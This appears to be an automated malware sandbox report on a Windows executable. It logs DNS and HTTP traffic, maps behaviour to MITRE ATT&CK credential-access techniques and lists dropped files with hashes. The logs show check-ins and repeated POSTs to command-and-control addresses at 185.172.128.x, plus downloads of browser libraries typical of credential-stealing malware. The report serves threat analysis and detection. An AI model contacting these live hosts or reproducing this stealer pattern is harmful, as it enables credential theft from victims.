8.8.8.8:53

Request

145.128.172.185.in-addr.arpa

IN PTR

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

217.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.135.221.88.in-addr.arpa

IN PTR

Response

217.135.221.88.in-addr.arpa

IN PTR

a88-221-135-217deploystaticakamaitechnologiescom
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

chromewebstore.googleapis.com

msedge.exe

Remote address:

8.8.8.8:53

Request

chromewebstore.googleapis.com

IN A

Response

chromewebstore.googleapis.com

IN A

142.250.187.202

chromewebstore.googleapis.com

IN A

142.250.187.234

chromewebstore.googleapis.com

IN A

172.217.16.234

chromewebstore.googleapis.com

IN A

142.250.178.10

chromewebstore.googleapis.com

IN A

142.250.200.42

chromewebstore.googleapis.com

IN A

142.250.200.10

chromewebstore.googleapis.com

IN A

216.58.201.106

chromewebstore.googleapis.com

IN A

216.58.204.74

chromewebstore.googleapis.com

IN A

216.58.213.10

chromewebstore.googleapis.com

IN A

216.58.212.202

chromewebstore.googleapis.com

IN A

216.58.212.234

chromewebstore.googleapis.com

IN A

142.250.179.234

chromewebstore.googleapis.com

IN A

142.250.180.10
DNS

chromewebstore.googleapis.com

msedge.exe

Remote address:

8.8.8.8:53

Request

chromewebstore.googleapis.com

IN Unknown

Response
DNS

202.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.187.250.142.in-addr.arpa

IN PTR

Response

202.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f101e100net
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418583_14V7XNG13AXXMHR4D&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418583_14V7XNG13AXXMHR4D&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 617937
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 931BB716B3F24DB7ADD243784E94E170 Ref B: LON04EDGE0618 Ref C: 2024-03-09T03:56:36Z
date: Sat, 09 Mar 2024 03:56:35 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300933_1BHZAO1SQN99WZXJ8&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300933_1BHZAO1SQN99WZXJ8&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 354022
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: FF2E303CA037469CAFF02E0EB99519B8 Ref B: LON04EDGE0618 Ref C: 2024-03-09T03:56:36Z
date: Sat, 09 Mar 2024 03:56:35 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301366_1F7IE3E9ETFG8ONMF&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301366_1F7IE3E9ETFG8ONMF&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 351064
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 209456040F0D4119865CCCCFF2321E66 Ref B: LON04EDGE0618 Ref C: 2024-03-09T03:56:36Z
date: Sat, 09 Mar 2024 03:56:35 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339384870_1WSZL43T6U4G68XY0&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339384870_1WSZL43T6U4G68XY0&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 327146
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4EED7418C55E4C9AB8E4E074A3BC6A6C Ref B: LON04EDGE0618 Ref C: 2024-03-09T03:56:36Z
date: Sat, 09 Mar 2024 03:56:35 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239339384869_1U4BU5OP1KBSS4EDT&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239339384869_1U4BU5OP1KBSS4EDT&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 338095
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3655981118784AA3802C98CDD2C63E86 Ref B: LON04EDGE0618 Ref C: 2024-03-09T03:56:36Z
date: Sat, 09 Mar 2024 03:56:35 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340418584_19MU177BXG1FCVM1K&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340418584_19MU177BXG1FCVM1K&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 571516
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 85494EFAA3B04823823F650F382C10D0 Ref B: LON04EDGE0618 Ref C: 2024-03-09T03:56:36Z
date: Sat, 09 Mar 2024 03:56:36 GMT
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

9.179.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.179.89.13.in-addr.arpa

IN PTR

Response

185.172.128.90:80

http://185.172.128.90/cpa/ping.php?substr=seven&s=ab

http

d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe

383 B
336 B
5
3

HTTP Request

GET http://185.172.128.90/cpa/ping.php?substr=seven&s=ab

HTTP Response

200
185.172.128.187:80

http://185.172.128.187/ping.php?substr=seven

http

d2d505a4944a92388e3ba620b02cab05c49be2be4e30329113d6da493223e5bb.exe

375 B
335 B
5
3

HTTP Request

GET http://185.172.128.187/ping.php?substr=seven

HTTP Response

200
185.172.128.145:80

http://185.172.128.145/3cd2b41cbde8fc9c.php

http

syncUpd.exe

7.9MB
5.5MB
10081
6910

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/sqlite3.dll

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/freebl3.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/mozglue.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/msvcp140.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/nss3.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/softokn3.dll

HTTP Response

200

HTTP Request

GET http://185.172.128.145/15f649199f40275b/vcruntime140.dll

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200

HTTP Request

POST http://185.172.128.145/3cd2b41cbde8fc9c.php

HTTP Response

200
204.79.197.200:443

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

tls, http2

2.0kB
9.2kB
21
19

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

HTTP Response

204
142.250.187.202:443

chromewebstore.googleapis.com

tls

msedge.exe

1.9kB
7.9kB
15
16
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
13
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239340418584_19MU177BXG1FCVM1K&pid=21.2&w=1920&h=1080&c=4

tls, http2

93.5kB
2.7MB
1925
1922

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418583_14V7XNG13AXXMHR4D&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317300933_1BHZAO1SQN99WZXJ8&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301366_1F7IE3E9ETFG8ONMF&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339384870_1WSZL43T6U4G68XY0&pid=21.2&w=1080&h=1920&c=4

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239339384869_1U4BU5OP1KBSS4EDT&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418584_19MU177BXG1FCVM1K&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14

8.8.8.8:53

73.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

73.31.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

90.128.172.185.in-addr.arpa

dns

73 B
73 B
1
1

DNS Request

90.128.172.185.in-addr.arpa
8.8.8.8:53

205.47.74.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

205.47.74.20.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

187.128.172.185.in-addr.arpa

dns

74 B
74 B
1
1

DNS Request

187.128.172.185.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
158 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

145.128.172.185.in-addr.arpa

dns

74 B
74 B
1
1

DNS Request

145.128.172.185.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

217.135.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

217.135.221.88.in-addr.arpa
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa
8.8.8.8:53

chromewebstore.googleapis.com

dns

msedge.exe

75 B
283 B
1
1

DNS Request

chromewebstore.googleapis.com

DNS Response

142.250.187.202

142.250.187.234

172.217.16.234

142.250.178.10

142.250.200.42

142.250.200.10

216.58.201.106

216.58.204.74

216.58.213.10

216.58.212.202

216.58.212.234

142.250.179.234

142.250.180.10
8.8.8.8:53

chromewebstore.googleapis.com

dns

msedge.exe

75 B
132 B
1
1

DNS Request

chromewebstore.googleapis.com
8.8.8.8:53

202.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

202.187.250.142.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

26.35.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

26.35.223.20.in-addr.arpa
8.8.8.8:53

9.179.89.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

9.179.89.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

Filesize
1.7MB

MD5
eee5ddcffbed16222cac0a1b4e2e466e

SHA1
28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5

SHA256
2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54

SHA512
8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsfF89A.tmp\INetC.dll

Filesize
21KB

MD5
2b342079303895c50af8040a91f30f71

SHA1
b11335e1cb8356d9c337cb89fe81d669a69de17e

SHA256
2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f

SHA512
550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

Download Submit
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe

Filesize
229KB

MD5
eda757c6ae24693068781c06550cb3a6

SHA1
026eff85b267da853dac6cc00866bd1cb1c02c4d

SHA256
748733ef6b3518ec18acbf68a3fa7f43e403738a29a275d6cb2df8e87851c277

SHA512
36d171794fa540ecd6112dc1c8f1f393be60af9a1bb8da9e0e64363c390f3c68d370df569738192cfba09361d60e89bac219f0802a5a7c1670c86801c1742060

Download Submit
C:\Users\Admin\AppData\Roaming\Temp\Task.bat

Filesize
128B

MD5
11bb3db51f701d4e42d3287f71a6a43e

SHA1
63a4ee82223be6a62d04bdfe40ef8ba91ae49a86

SHA256
6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331

SHA512
907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

Download Submit
memory/1292-20-0x0000000000400000-0x0000000000459000-memory.dmp

Filesize
356KB

Download
memory/3972-26-0x0000000000400000-0x0000000001F10000-memory.dmp

Filesize
27.1MB

Download
memory/3972-30-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/3972-81-0x0000000000400000-0x0000000001F10000-memory.dmp

Filesize
27.1MB

Download
memory/3972-25-0x0000000003B30000-0x0000000003B57000-memory.dmp

Filesize
156KB

Download
memory/3972-24-0x0000000002090000-0x0000000002190000-memory.dmp

Filesize
1024KB

Download
memory/3972-131-0x0000000000400000-0x0000000001F10000-memory.dmp

Filesize
27.1MB

Download
memory/3988-22-0x00000000027F0000-0x00000000027F1000-memory.dmp

Filesize
4KB

Download
memory/3988-105-0x0000000000400000-0x0000000000930000-memory.dmp

Filesize
5.2MB

Download
memory/3988-21-0x0000000000400000-0x0000000000930000-memory.dmp

Filesize
5.2MB

Download
memory/3988-134-0x00000000027F0000-0x00000000027F1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request